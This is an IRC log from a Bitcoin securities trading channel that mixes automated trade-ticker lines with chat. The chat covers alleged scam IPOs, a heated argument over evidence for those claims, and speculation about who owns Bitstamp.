[BTCTC] [LABCOIN] 80 @ 0.001502 = 0.1202 BTC [-] Aug 12 14:25:04 https://bitcointalk.org/index.php?topic=264696.msg2914929#msg2914929 Aug 12 14:25:04 [BTCTC] [ASICMINER-PT] 3 @ 4.17 = 12.51 BTC [-] Aug 12 14:25:08 wtf Aug 12 14:25:09 [BTCT.CO] [IPO-cancelled] BTCGARDEN MINER---Eyes to the horizon Aug 12 14:25:38 [BTCTC] [ASICMINER-PT] 4 @ 4.198 = 16.792 BTC [+] Aug 12 14:25:48 [BTCTC] [ACTIVEMINING] 97 @ 0.005915 = 0.5738 BTC [-] Aug 12 14:25:49 [BTCTC] [ACTIVEMINING] 60 @ 0.005916 = 0.355 BTC [+] Aug 12 14:25:51 [BTCTC] [ACTIVEMINING] 15 @ 0.00592 = 0.0888 BTC [+] Aug 12 14:26:21 [BTCTC] [LABCOIN] 30 @ 0.001508 = 0.0452 BTC [+] Aug 12 14:26:43 [BTCTC] [LABCOIN] 30 @ 0.001508 = 0.0452 BTC [+] Aug 12 14:26:52 jurov lol. Aug 12 14:27:09 [BTCTC] [LABCOIN] 20 @ 0.001507 = 0.0301 BTC [-] Aug 12 14:27:57 [BTCTC] [LABCOIN] 10 @ 0.001509 = 0.0151 BTC [+] Aug 12 14:27:59 [BTCTC] [LABCOIN] 20 @ 0.001509 = 0.0302 BTC [+] Aug 12 14:28:06 best quote: Thankfully iCE.DRiLL will not have its reputation sullied by being listed among the scams at the BTCT boiler room. Aug 12 14:29:06 lolk Aug 12 14:30:08 [BTCTC] [LABCOIN] 50 @ 0.00151 = 0.0755 BTC [+] Aug 12 14:30:09 [BTCTC] [LABCOIN] 50 @ 0.001511 = 0.0756 BTC [+] Aug 12 14:30:11 [BTCTC] [LABCOIN] 130 @ 0.001518 = 0.1973 BTC [+] Aug 12 14:30:11 [BTCTC] [LABCOIN] 290 @ 0.001525 = 0.4423 BTC [+] Aug 12 14:30:12 [BTCTC] [LABCOIN] 410 @ 0.001525 = 0.6253 BTC [+] Aug 12 14:30:13 [BTCTC] [LABCOIN] 1000 @ 0.00153 = 1.53 BTC [+] Aug 12 14:30:14 [BTCTC] [LABCOIN] 450 @ 0.001537 = 0.6917 BTC [+] Aug 12 14:30:26 [BTCTC] [LABCOIN] 250 @ 0.001542 = 0.3855 BTC [+] Aug 12 14:30:27 [BTCTC] [LABCOIN] 260 @ 0.001544 = 0.4014 BTC [+] Aug 12 14:30:28 [BTCTC] [LABCOIN] 180 @ 0.001556 = 0.2801 BTC [+] Aug 12 14:30:29 [BTCTC] [LABCOIN] 1107 @ 0.001575 = 1.7435 BTC [+] Aug 12 14:30:31 [BTCTC] [LABCOIN] 100 @ 0.001578 = 0.1578 BTC [+] Aug 12 14:30:32 [BTCTC] [LABCOIN] 1 @ 0.001584 BTC [+] Aug 12 14:30:33 [BTCTC] [LABCOIN] 1304 @ 0.001584 = 2.0655 BTC [+] Aug 12 14:30:33 [BTCTC] [LABCOIN] 3027 @ 0.001585 = 4.7978 BTC [+] Aug 12 14:30:34 [BTCTC] [LABCOIN] 1000 @ 0.001586 = 1.586 BTC [+] Aug 12 14:30:35 [BTCTC] [LABCOIN] 1200 @ 0.001588 = 1.9056 BTC [+] Aug 12 14:30:36 [BTCTC] [LABCOIN] 1940 @ 0.001595 = 3.0943 BTC [+] Aug 12 14:30:38 [BTCTC] [LABCOIN] 83 @ 0.001596 = 0.1325 BTC [+] Aug 12 14:30:39 [BTCTC] [LABCOIN] 1606 @ 0.001597 = 2.5648 BTC [+] Aug 12 14:31:26 [BTCTC] [LABCOIN] 1080 @ 0.001598 = 1.7258 BTC [+] Aug 12 14:31:27 [BTCTC] [LABCOIN] 300 @ 0.001598 = 0.4794 BTC [+] Aug 12 14:31:28 [BTCTC] [LABCOIN] 50 @ 0.001599 = 0.08 BTC [+] Aug 12 14:31:29 [BTCTC] [LABCOIN] 50 @ 0.001599 = 0.08 BTC [+] Aug 12 14:31:46 it's on bitfunder? Aug 12 14:32:22 yeah. another reason not to even try to understand what it is Aug 12 14:35:36 its a motherfucking ice DRILL Aug 12 14:36:34 made out of fasthashing hashfasts Aug 12 14:37:01 will leet lower case i's Aug 12 14:37:02 I'm impressed that they're buying back all the shares Aug 12 14:37:48 any wild guess about the motivation of the one who threatened garden besides trolling and personal disaffection? Aug 12 14:38:10 extorsion/blackmail Aug 12 14:38:46 dexX7 looky here : the ipo sold to itself. Aug 12 14:38:56 btct doesn't want this dirty secret exposed, especially after being on trilema. Aug 12 14:39:06 the scammer has no need of the "ipo" as it diodn't produce anything Aug 12 14:39:15 so the "buyers" will be "bought out". ie, he is buying out himself Aug 12 14:39:28 this way burnside gets to delist a scam before it pops and maintain the pretense a little longer. Aug 12 14:40:43 ah i see.. it was burnside's plan to generate fees? :p Aug 12 14:41:10 nope. Aug 12 14:41:25 the ipo sold to itself *and* the price didn't go up Aug 12 14:41:28 it's a scamwin-scamwin situation. if it took off it plays one way. Aug 12 14:41:45 if it doesn't take off, well, at least there's all the wash trading to claim like btct is almost like mpex. Aug 12 14:41:50 if you compare to activemining, it was possible that they bought their own shares, but then sold them again Aug 12 14:42:02 anyway, writing this up. Aug 12 14:44:52 kk i got it, i think. they didn't sold enough while ipo'ing (thus they bought it themselfs) and then they put up the remaining shares, but still not much demand, so they shut it down Aug 12 14:45:30 Is there any evidence to your theory, mircea_popescu? Aug 12 14:45:58 kleeck just as soon as publish on trilema there will be. Aug 12 14:46:22 You mean you're creating evidence? Or you're revealinge evidence? ;) Aug 12 14:46:50 this theory doesn't sound like much profit anyway Aug 12 14:47:28 [BTCTC] [DMS.MINING] 5 @ 0.003775 = 0.0189 BTC [-] Aug 12 14:47:29 even if they'd sucked out the range .0014-.0016 over and over again Aug 12 14:47:53 *.014-.016 Aug 12 14:48:13 dexX7 that's not the profit. Aug 12 14:48:29 obviously the scam failed, and for obvious reasons, unless you don't want to see them. Aug 12 14:48:33 [BTCTC] [LABCOIN] 120 @ 0.00157 = 0.1884 BTC [-] Aug 12 14:48:34 [BTCTC] [LABCOIN] 720 @ 0.001575 = 1.134 BTC [+] Aug 12 14:48:36 [BTCTC] [LABCOIN] 700 @ 0.00158 = 1.106 BTC [+] Aug 12 14:48:36 [BTCTC] [LABCOIN] 700 @ 0.00159 = 1.113 BTC [+] Aug 12 14:48:37 [BTCTC] [LABCOIN] 699 @ 0.0016 = 1.1184 BTC [+] Aug 12 14:48:38 [BTCTC] [LABCOIN] 3000 @ 0.0016 = 4.8 BTC [+] Aug 12 14:48:39 [BTCTC] [LABCOIN] 150 @ 0.0016 = 0.24 BTC [+] Aug 12 14:48:40 [BTCTC] [LABCOIN] 50 @ 0.0016 = 0.08 BTC [+] Aug 12 14:49:09 could you please define what was the scam? Aug 12 14:50:27 [BTCTC] [ASICMINER-PT] 7 @ 4.071 = 28.497 BTC [-] Aug 12 14:51:12 The burden of proof lies with you, mircea_popescu. To say it is so "obvious" isn't proving anything. What evidence do you have? Aug 12 14:51:31 the obvious scam would be "collect up to 32k btc and run", but that wasn't the case Aug 12 14:51:50 btc-tc's involvement to generate fees/marketing is far fetched, too Aug 12 14:51:57 [BTCTC] [LABCOIN] 500 @ 0.001607 = 0.8035 BTC [+] Aug 12 14:52:15 [BTCTC] [LABCOIN] 250 @ 0.001633 = 0.4083 BTC [+] Aug 12 14:52:15 sucking out .014-.016 might be possible, but that range only had a volume of combined 4k Aug 12 14:52:16 [BTCTC] [LABCOIN] 1000 @ 0.001633 = 1.633 BTC [+] Aug 12 14:52:17 [BTCTC] [LABCOIN] 200 @ 0.001642 = 0.3284 BTC [+] Aug 12 14:52:17 [BTCTC] [LABCOIN] 10000 @ 0.001649 = 16.49 BTC [+] Aug 12 14:52:35 [BTCTC] [LABCOIN] 5000 @ 0.00165 = 8.25 BTC [+] Aug 12 14:53:45 [BTCTC] [LABCOIN] 300 @ 0.00165 = 0.495 BTC [+] Aug 12 14:54:58 [BTCTC] [ASICMINER-PT] 1 @ 4.169 BTC [+] Aug 12 14:55:09 [BTCTC] [LABCOIN] 4700 @ 0.00165 = 7.755 BTC [+] Aug 12 14:55:10 [BTCTC] [LABCOIN] 50 @ 0.00165 = 0.0825 BTC [+] Aug 12 14:55:12 [BTCTC] [LABCOIN] 50 @ 0.00165 = 0.0825 BTC [+] Aug 12 14:55:41 meanwhile at yifu's place https://www.youtube.com/watch?v=xkCBc6kSL10 Aug 12 14:55:54 kleeck you're new here. Aug 12 14:55:54 [BTCTC] [LABCOIN] 250 @ 0.00167 = 0.4175 BTC [+] Aug 12 14:56:10 i have no burden of proof with you. i say what i say, people do what they do. Aug 12 14:56:17 [BTCTC] [LABCOIN] 250 @ 0.00164 = 0.41 BTC [-] Aug 12 14:56:21 some get to be old here, others just get to be new again. that's the whole thing. Aug 12 14:56:51 [BTCTC] [LABCOIN] 1000 @ 0.00168 = 1.68 BTC [+] Aug 12 14:56:52 dexX7 guess why that wasn't the case. Aug 12 14:57:17 guys its not a scam, it was his friend Chen Aug 12 14:57:24 he'll pay you back Aug 12 14:57:25 Great defense, mircea_popescu. I'll stop wasting my time. Aug 12 14:57:37 it's not a defense. Aug 12 14:57:41 No, it's not. Aug 12 14:57:49 agasin, i am not "defending". i'm telling you what is. Aug 12 14:57:52 [BTCTC] [LABCOIN] 330 @ 0.001688 = 0.557 BTC [+] Aug 12 14:57:54 [BTCTC] [LABCOIN] 50 @ 0.00169 = 0.0845 BTC [+] Aug 12 14:57:54 you're welcome to find out on your own ass. Aug 12 14:57:54 [BTCTC] [LABCOIN] 2000 @ 0.001694 = 3.388 BTC [+] Aug 12 14:57:55 You just spew theories and deride people who ask for evidence. Aug 12 14:57:55 [BTCTC] [LABCOIN] 1943 @ 0.001695 = 3.2934 BTC [+] Aug 12 14:57:56 [BTCTC] [LABCOIN] 3050 @ 0.0017 = 5.185 BTC [+] Aug 12 14:58:02 i do not spew theories. i tell you what it is. Aug 12 14:58:07 the difference is significant. Aug 12 14:58:11 [BTCTC] [LABCOIN] 1950 @ 0.0017 = 3.315 BTC [+] Aug 12 14:58:13 [BTCTC] [LABCOIN] 50 @ 0.0017 = 0.085 BTC [+] Aug 12 14:58:32 It's nothing until their is proof. No matter what you say. Aug 12 14:58:38 http://trilema.com/2013/the-anatomy-of-another-scam/ << and here we go, the proof. Aug 12 14:58:41 The anatomy of another scam. pe Trilema - Un blog de Mircea Popescu. Aug 12 14:58:47 kleeck this is your mistake. what i say matters. Aug 12 14:58:47 this is my point of view: either the current scam theory is incomplete/wrong or they are very stupid scammers Aug 12 14:59:05 the expectation for formal proof is misguided, as vandroyi explains for your benefit. Aug 12 14:59:15 dexX7 they are very stupid scammers, i'd say. Aug 12 14:59:32 The only thing that matters is the truth, whether from you or anyone else. Aug 12 14:59:34 meanwhile at yifu's place https://www.youtube.com/watch?v=xkCBc6kSL10 Aug 12 14:59:48 [BTCTC] [LABCOIN] 140 @ 0.00172 = 0.2408 BTC [+] Aug 12 14:59:58 [BTCTC] [ASICMINER-PT] 2 @ 4.169 = 8.338 BTC [+] Aug 12 15:00:01 I'm reading your article. Should be interesting. Hopefully it isn't more drivel. Aug 12 15:00:04 lol look at those pathetic women waving kitchen knives around Aug 12 15:00:34 hmmm Aug 12 15:00:36 kleeck you don't get to opine on what i publish. Aug 12 15:00:40 so apparently Aug 12 15:00:45 bitstamp was sold 5 days ago Aug 12 15:00:46 I absolutely do. And I have. Aug 12 15:00:51 To whom? Aug 12 15:01:10 [BTCTC] [ACTIVEMINING] 30 @ 0.00576 = 0.1728 BTC [-] Aug 12 15:01:21 [BTCTC] [ACTIVEMINING] 50 @ 0.005759 = 0.288 BTC [-] Aug 12 15:01:22 [BTCTC] [ACTIVEMINING] 20 @ 0.005651 = 0.113 BTC [-] Aug 12 15:01:24 [BTCTC] [ACTIVEMINING] 100 @ 0.00565 = 0.565 BTC [-] Aug 12 15:01:24 [BTCTC] [ACTIVEMINING] 362 @ 0.005605 = 2.029 BTC [-] Aug 12 15:01:25 [BTCTC] [ACTIVEMINING] 238 @ 0.005604 = 1.3338 BTC [-] Aug 12 15:02:11 [BTCTC] [LABCOIN] 200 @ 0.001695 = 0.339 BTC [-] Aug 12 15:02:13 [BTCTC] [LABCOIN] 250 @ 0.00173 = 0.4325 BTC [+] Aug 12 15:02:15 [BTCTC] [LABCOIN] 2000 @ 0.001748 = 3.496 BTC [+] Aug 12 15:02:52 [BTCTC] [BASIC-MINING] 1 @ 0.3268 BTC [+] Aug 12 15:03:13 kleeck no. you're only tolerated in a trade channel because the people that matter are occasionally amused by whathever the cat drags in. Aug 12 15:03:22 this is not to be confused with any sort of standing or importance. Aug 12 15:03:26 [BTCTC] [LABCOIN] 30 @ 0.001652 = 0.0496 BTC [-] Aug 12 15:03:32 https://docs.google.com/viewer?a=v&pid=gmail&attid=0.1&thid=1407267fc120d29e&mt=image/tiff&url=https://mail.google.com/mail/u/0/?ui%3D2%26ik%3De6a8ee0dff%26view%3Datt%26th%3D1407267fc120d29e%26attid%3D0.1%26disp%3Dsafe%26zw&sig=AHIEtbQSgqJpeAqVS-AER-WW4VQcpOso_A Aug 12 15:03:34 [BTCTC] [TAT.MINIGAME] 100 @ 0.00022 = 0.022 BTC [-] Aug 12 15:03:36 Welcome to Google Docs Aug 12 15:03:36 [BTCTC] [TAT.MINIGAME] 10 @ 0.000219 = 0.0022 BTC [-] Aug 12 15:03:37 [BTCTC] [TAT.MINIGAME] 10 @ 0.00021 = 0.0021 BTC [-] Aug 12 15:03:38 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002041 = 0.0102 BTC [-] Aug 12 15:03:38 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002021 = 0.0404 BTC [-] Aug 12 15:03:39 [BTCTC] [TAT.MINIGAME] 252 @ 0.000202 = 0.0509 BTC [-] Aug 12 15:04:08 [BTCTC] [ACTIVEMINING] 22 @ 0.005916 = 0.1302 BTC [+] Aug 12 15:04:18 hm Aug 12 15:04:19 Says the guy who attempts to pass the equivalent of tabloid articles off as "news". You have wasted quite enough of my time, mircea_popescu. Aug 12 15:04:37 kakobrekla: n/a Aug 12 15:04:43 kakobrekla: can't open Aug 12 15:04:56 [BTCTC] [ACTIVEMINING] 6 @ 0.005914 = 0.0355 BTC [-] Aug 12 15:04:59 this is more important Aug 12 15:05:00 http://www.ajpes.si/prs/podjetje_zgodovina.asp?s=1&e=504891&n=1&pdf=no Aug 12 15:05:05 AJPES - Agencija Republike Slovenije za javnopravne evidence in storitve Aug 12 15:05:07 but its in slovene Aug 12 15:05:31 [BTCTC] [ACTIVEMINING] 6 @ 0.005914 = 0.0355 BTC [-] Aug 12 15:05:32 [BTCTC] [ACTIVEMINING] 9 @ 0.005915 = 0.0532 BTC [+] Aug 12 15:06:20 [BTCTC] [TAT.ASICMINER] 25 @ 0.04123 = 1.0308 BTC [+] Aug 12 15:06:46 so who is Grossus Ltd? Aug 12 15:06:58 http://www.grossus.cz/ Aug 12 15:07:00 n/a Aug 12 15:07:16 [BTCTC] [LABCOIN] 100 @ 0.001695 = 0.1695 BTC [+] Aug 12 15:07:17 [BTCTC] [LABCOIN] 220 @ 0.001732 = 0.381 BTC [+] Aug 12 15:07:19 [BTCTC] [LABCOIN] 175 @ 0.001737 = 0.304 BTC [+] Aug 12 15:07:20 [BTCTC] [LABCOIN] 500 @ 0.001747 = 0.8735 BTC [+] Aug 12 15:07:42 [BTCTC] [LABCOIN] 30 @ 0.001747 = 0.0524 BTC [+] Aug 12 15:07:47 well anyway. was this attached to any announcement? Aug 12 15:08:16 [BTCTC] [LABCOIN] 150 @ 0.001748 = 0.2622 BTC [+] Aug 12 15:08:42 this things have ways ending up in my email box Aug 12 15:08:59 these things Aug 12 15:09:14 [BTCTC] [LABCOIN] 8 @ 0.001748 = 0.014 BTC [+] Aug 12 15:09:51 [BTCTC] [LABCOIN] 19 @ 0.001695 = 0.0322 BTC [-] Aug 12 15:10:54 [BTCTC] [LABCOIN] 81 @ 0.001695 = 0.1373 BTC [-] Aug 12 15:11:08 [BTCTC] [LABCOIN] 200 @ 0.001732 = 0.3464 BTC [+] Aug 12 15:11:09 [BTCTC] [LABCOIN] 100 @ 0.001738 = 0.1738 BTC [+] Aug 12 15:11:11 [BTCTC] [LABCOIN] 1823 @ 0.001748 = 3.1866 BTC [+] Aug 12 15:11:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005617 = 0.1685 BTC [-] Aug 12 15:11:25 [BTCTC] [ACTIVEMINING] 16 @ 0.005616 = 0.0899 BTC [-] Aug 12 15:11:25 [BTCTC] [ACTIVEMINING] 50 @ 0.005614 = 0.2807 BTC [-] Aug 12 15:11:26 [BTCTC] [ACTIVEMINING] 314 @ 0.005605 = 1.76 BTC [-] Aug 12 15:11:39 [BTCTC] [ASICMINER-PT] 4 @ 4.167 = 16.668 BTC [-] Aug 12 15:11:41 [BTCTC] [ASICMINER-PT] 2 @ 4.168 = 8.336 BTC [+] Aug 12 15:12:50 [BTCTC] [LABCOIN] 100 @ 0.00174 = 0.174 BTC [-] Aug 12 15:13:03 [BTCTC] [LABCOIN] 60 @ 0.00174 = 0.1044 BTC [-] Aug 12 15:13:04 [BTCTC] [LABCOIN] 19 @ 0.001748 = 0.0332 BTC [+] Aug 12 15:13:05 [BTCTC] [LABCOIN] 1000 @ 0.001749 = 1.749 BTC [+] Aug 12 15:13:06 [BTCTC] [LABCOIN] 500 @ 0.001749 = 0.8745 BTC [+] Aug 12 15:13:08 [BTCTC] [LABCOIN] 100 @ 0.001749 = 0.1749 BTC [+] Aug 12 15:13:09 [BTCTC] [LABCOIN] 2321 @ 0.00175 = 4.0618 BTC [+] Aug 12 15:13:15 [BTCTC] [ASICMINER-PT] 5 @ 4.17 = 20.85 BTC [+] Aug 12 15:13:15 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [+] Aug 12 15:13:16 [BTCTC] [ASICMINER-PT] 5 @ 4.195 = 20.975 BTC [+] Aug 12 15:13:17 [BTCTC] [ASICMINER-PT] 5 @ 4.199 = 20.995 BTC [+] Aug 12 15:13:19 [BTCTC] [ASICMINER-PT] 1 @ 4.199 BTC [+] Aug 12 15:13:20 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [+] Aug 12 15:13:21 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Aug 12 15:14:03 [BTCTC] [LABCOIN] 2679 @ 0.00175 = 4.6883 BTC [+] Aug 12 15:14:04 [BTCTC] [LABCOIN] 250 @ 0.001775 = 0.4438 BTC [+] Aug 12 15:14:09 [BTCTC] [LABCOIN] 100 @ 0.001749 = 0.1749 BTC [-] Aug 12 15:14:47 [BTCTC] [LABCOIN] 2000 @ 0.001795 = 3.59 BTC [+] Aug 12 15:15:14 [BTCTC] [ACTIVEMINING] 30 @ 0.005609 = 0.1683 BTC [+] Aug 12 15:15:16 [BTCTC] [ACTIVEMINING] 6 @ 0.005608 = 0.0336 BTC [-] Aug 12 15:15:17 [BTCTC] [ACTIVEMINING] 314 @ 0.005605 = 1.76 BTC [-] Aug 12 15:15:18 [BTCTC] [ACTIVEMINING] 762 @ 0.005604 = 4.2702 BTC [-] Aug 12 15:15:19 [BTCTC] [ACTIVEMINING] 810 @ 0.0056 = 4.536 BTC [-] Aug 12 15:15:21 [BTCTC] [ACTIVEMINING] 15 @ 0.005578 = 0.0837 BTC [-] Aug 12 15:15:22 [BTCTC] [ACTIVEMINING] 25 @ 0.005577 = 0.1394 BTC [-] Aug 12 15:15:23 [BTCTC] [ACTIVEMINING] 53 @ 0.005575 = 0.2955 BTC [-] Aug 12 15:15:24 [BTCTC] [ACTIVEMINING] 1619 @ 0.005546 = 8.979 BTC [-] Aug 12 15:15:25 [BTCTC] [ACTIVEMINING] 324 @ 0.005545 = 1.7966 BTC [-] Aug 12 15:15:25 [BTCTC] [ACTIVEMINING] 580 @ 0.005531 = 3.208 BTC [-] Aug 12 15:15:26 [BTCTC] [ACTIVEMINING] 1643 @ 0.00553 = 9.0858 BTC [-] Aug 12 15:15:31 [BTCTC] [BASIC-MINING] 1 @ 0.309 BTC [-] Aug 12 15:15:32 [BTCTC] [BASIC-MINING] 6 @ 0.308 = 1.848 BTC [-] Aug 12 15:15:34 [BTCTC] [BASIC-MINING] 2 @ 0.3016 = 0.6032 BTC [-] Aug 12 15:15:35 [BTCTC] [BASIC-MINING] 10 @ 0.3015 = 3.015 BTC [-] Aug 12 15:15:36 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [-] Aug 12 15:15:38 [BTCTC] [LABCOIN] 10 @ 0.00178 = 0.0178 BTC [-] Aug 12 15:17:11 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Aug 12 15:17:12 [BTCTC] [LABCOIN] 100 @ 0.001775 = 0.1775 BTC [-] Aug 12 15:17:13 [BTCTC] [LABCOIN] 70 @ 0.001776 = 0.1243 BTC [+] Aug 12 15:17:31 [BTCTC] [LABCOIN] 30 @ 0.001776 = 0.0533 BTC [+] Aug 12 15:17:32 [BTCTC] [LABCOIN] 100 @ 0.001777 = 0.1777 BTC [+] Aug 12 15:17:33 [BTCTC] [LABCOIN] 100 @ 0.001778 = 0.1778 BTC [+] Aug 12 15:17:35 [BTCTC] [LABCOIN] 100 @ 0.001779 = 0.1779 BTC [+] Aug 12 15:17:36 [BTCTC] [LABCOIN] 170 @ 0.00178 = 0.3026 BTC [+] Aug 12 15:17:37 [BTCTC] [LABCOIN] 2000 @ 0.001795 = 3.59 BTC [+] Aug 12 15:17:38 [BTCTC] [LABCOIN] 100 @ 0.001796 = 0.1796 BTC [+] Aug 12 15:17:39 [BTCTC] [LABCOIN] 2200 @ 0.001797 = 3.9534 BTC [+] Aug 12 15:17:40 [BTCTC] [LABCOIN] 4000 @ 0.001798 = 7.192 BTC [+] Aug 12 15:17:41 [BTCTC] [LABCOIN] 2123 @ 0.001799 = 3.8193 BTC [+] Aug 12 15:17:41 [BTCTC] [LABCOIN] 5000 @ 0.0018 = 9 BTC [+] Aug 12 15:18:06 [BTCTC] [TAT.ASICMINER] 9 @ 0.04123 = 0.3711 BTC [+] Aug 12 15:18:20 [BTCTC] [LABCOIN] 30 @ 0.001756 = 0.0527 BTC [-] Aug 12 15:18:22 [BTCTC] [LABCOIN] 400 @ 0.001755 = 0.702 BTC [-] Aug 12 15:18:24 [BTCTC] [LABCOIN] 53 @ 0.001701 = 0.0902 BTC [-] Aug 12 15:18:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.04174 = 0.1252 BTC [+] Aug 12 15:18:41 [BTCTC] [TAT.ASICMINER] 17 @ 0.04174 = 0.7096 BTC [+] Aug 12 15:20:35 [BTCTC] [TAT.ASICMINER] 78 @ 0.04175 = 3.2565 BTC [+] Aug 12 15:26:19 [BTCTC] [TAT.ASICMINER] 30 @ 0.04175 = 1.2525 BTC [+] Aug 12 15:26:35 [BTCTC] [LABCOIN] 30 @ 0.001777 = 0.0533 BTC [+] Aug 12 15:26:37 [BTCTC] [LABCOIN] 53 @ 0.001778 = 0.0942 BTC [+] Aug 12 15:26:38 [BTCTC] [LABCOIN] 6000 @ 0.00178 = 10.68 BTC [+] Aug 12 15:26:39 [BTCTC] [LABCOIN] 30 @ 0.00179 = 0.0537 BTC [+] Aug 12 15:26:40 [BTCTC] [LABCOIN] 50 @ 0.00179 = 0.0895 BTC [+] Aug 12 15:26:41 [BTCTC] [LABCOIN] 2137 @ 0.001808 = 3.8637 BTC [+] Aug 12 15:28:35 [BTCTC] [LABCOIN] 3133 @ 0.001808 = 5.6645 BTC [+] Aug 12 15:29:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.04175 = 0.334 BTC [+] Aug 12 15:29:29 [BTCTC] [LABCOIN] 950 @ 0.001808 = 1.7176 BTC [+] Aug 12 15:29:34 [BTCTC] [LABCOIN] 50 @ 0.001808 = 0.0904 BTC [+] Aug 12 15:29:37 [BTCTC] [LABCOIN] 100 @ 0.001808 = 0.1808 BTC [+] Aug 12 15:29:40 [BTCTC] [BITVPS] 250 @ 0.002128 = 0.532 BTC [-] Aug 12 15:29:41 [BTCTC] [LABCOIN] 20 @ 0.001808 = 0.0362 BTC [+] Aug 12 15:30:16 looks like mr robin sidel still writes at wsj (the guy with the $200m avalon story) http://online.wsj.com/article/SB10001424127887323585604579006880143449754.html Aug 12 15:30:21 [BTCTC] [LABCOIN] 50 @ 0.00181 = 0.0905 BTC [+] Aug 12 15:30:22 [BTCTC] [LABCOIN] 10 @ 0.00181 = 0.0181 BTC [+] Aug 12 15:30:24 [BTCTC] [LABCOIN] 50 @ 0.00181 = 0.0905 BTC [+] Aug 12 15:30:25 [BTCTC] [LABCOIN] 250 @ 0.001816 = 0.454 BTC [+] Aug 12 15:30:35 [BTCTC] [LABCOIN] 1640 @ 0.001817 = 2.9799 BTC [+] Aug 12 15:34:11 [BTCTC] [LABCOIN] 30 @ 0.001711 = 0.0513 BTC [-] Aug 12 15:34:13 [BTCTC] [LABCOIN] 20 @ 0.001708 = 0.0342 BTC [-] Aug 12 15:34:14 [BTCTC] [LABCOIN] 950 @ 0.001702 = 1.6169 BTC [-] Aug 12 15:35:19 [BTCTC] [DMS.MINING] 25 @ 0.003598 = 0.09 BTC [-] Aug 12 15:35:21 [BTCTC] [DMS.MINING] 360 @ 0.003599 = 1.2956 BTC [+] Aug 12 15:35:22 [BTCTC] [DMS.MINING] 108 @ 0.0036 = 0.3888 BTC [+] Aug 12 15:35:26 ya well, you wouldn't expect him to get fired over that. Aug 12 15:35:29 it's the press, it lies. Aug 12 15:36:05 with the press, you should be happy when they admit they were wrong Aug 12 15:36:07 kakobrekla so what does the slovene sya ? Aug 12 15:36:10 [BTCTC] [LABCOIN] 30 @ 0.001807 = 0.0542 BTC [+] Aug 12 15:37:51 [BTCTC] [LABCOIN] 12 @ 0.001797 = 0.0216 BTC [-] Aug 12 15:38:40 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [+] Aug 12 15:38:42 kleeck i'm not "attempting" dood. they're not "tabloid articles". you're roughly in the situation of some uppity douche that came off the street into open theatre ER and now wants to argue with the chief surgeon. Aug 12 15:39:03 you don't have the qualifications to do so. yes it's open theatre so idiots like you may educate themselves, but that does not mean what you think it means. Aug 12 15:39:06 stfu and lurk moar. Aug 12 15:40:20 [BTCTC] [LABCOIN] 15 @ 0.001789 = 0.0268 BTC [-] Aug 12 15:40:22 [BTCTC] [LABCOIN] 545 @ 0.00179 = 0.9756 BTC [+] Aug 12 15:41:13 [BTCTC] [TAT.MINIGAME] 100 @ 0.000231 = 0.0231 BTC [+] Aug 12 15:41:29 [BTCTC] [LABCOIN] 30 @ 0.001721 = 0.0516 BTC [-] Aug 12 15:41:30 [BTCTC] [LABCOIN] 6 @ 0.00172 = 0.0103 BTC [-] Aug 12 15:41:31 [BTCTC] [LABCOIN] 20 @ 0.001718 = 0.0344 BTC [-] Aug 12 15:41:32 mircea_popescu: you seem to insult people all day Aug 12 15:41:33 [BTCTC] [LABCOIN] 125 @ 0.001701 = 0.2126 BTC [-] Aug 12 15:41:33 im not sure, bitstamp is now grossus which is owned by ZRPI which is by Milan Kozlevcar or something Aug 12 15:41:34 [BTCTC] [LABCOIN] 1000 @ 0.0017 = 1.7 BTC [-] Aug 12 15:41:36 it's my dream job Aug 12 15:41:57 like that guy in Hitchhiker's Guide to the Galaxy Aug 12 15:42:33 [BTCTC] [LABCOIN] 91 @ 0.001678 = 0.1527 BTC [-] Aug 12 15:42:35 [BTCTC] [LABCOIN] 703 @ 0.001676 = 1.1782 BTC [-] Aug 12 15:42:35 [BTCTC] [LABCOIN] 53 @ 0.001669 = 0.0885 BTC [-] Aug 12 15:42:37 [BTCTC] [LABCOIN] 125 @ 0.001668 = 0.2085 BTC [-] Aug 12 15:42:38 [BTCTC] [LABCOIN] 27 @ 0.001668 = 0.045 BTC [-] Aug 12 15:43:24 pankkake i don't insult people. i just slap children occasionally, when they get out of line Aug 12 15:43:27 mostly i don't tho. Aug 12 15:43:37 "If you focus on the insults and indulge in your emotions, then you are not ready to understand the advice she offers. If you can peel away the act, and focus on the substance, you will garner diamonds from the rough." Aug 12 15:43:49 kakobrekla hm. Aug 12 15:43:58 :) Aug 12 15:44:21 "insult" is probably not the way to put it Aug 12 15:44:37 :p Aug 12 15:45:44 of course if american famblies were made out of men and women rather than just women Aug 12 15:45:55 i wouldn't have to randomly slap grown children across the internet all day Aug 12 15:46:13 <[1]lewicki> uh huh Aug 12 15:46:14 arguably that country wouldn't be bankrupt and a laughingstock, either. Aug 12 15:46:17 ;;seen theswede75 Aug 12 15:46:18 I have not seen theswede75. Aug 12 15:46:28 mircea_popescu its not clear to me what happend nor anyone else i know can put it together Aug 12 15:46:28 sadly true for other countries Aug 12 15:46:29 ;;seen TheSwede75 Aug 12 15:46:30 I have not seen TheSwede75. Aug 12 15:46:55 [BTCTC] [LABCOIN] 206 @ 0.001777 = 0.3661 BTC [+] Aug 12 15:46:58 [BTCTC] [LABCOIN] 30 @ 0.001777 = 0.0533 BTC [+] Aug 12 15:46:58 [BTCTC] [LABCOIN] 30 @ 0.001776 = 0.0533 BTC [-] Aug 12 15:46:58 at least so far Aug 12 15:47:13 Milan Kozlevcar - English to Slovenian translator ? Aug 12 15:47:30 [BTCTC] [LABCOIN] 1623 @ 0.001773 = 2.8776 BTC [-] Aug 12 15:47:31 [BTCTC] [LABCOIN] 30 @ 0.001774 = 0.0532 BTC [+] Aug 12 15:47:32 [BTCTC] [LABCOIN] 160 @ 0.001775 = 0.284 BTC [+] Aug 12 15:47:37 http://www.linkedin.com/in/ekliptika Aug 12 15:47:40 Milan Kozlevcar | LinkedIn Aug 12 15:48:03 Past Aug 12 15:48:03 Managing 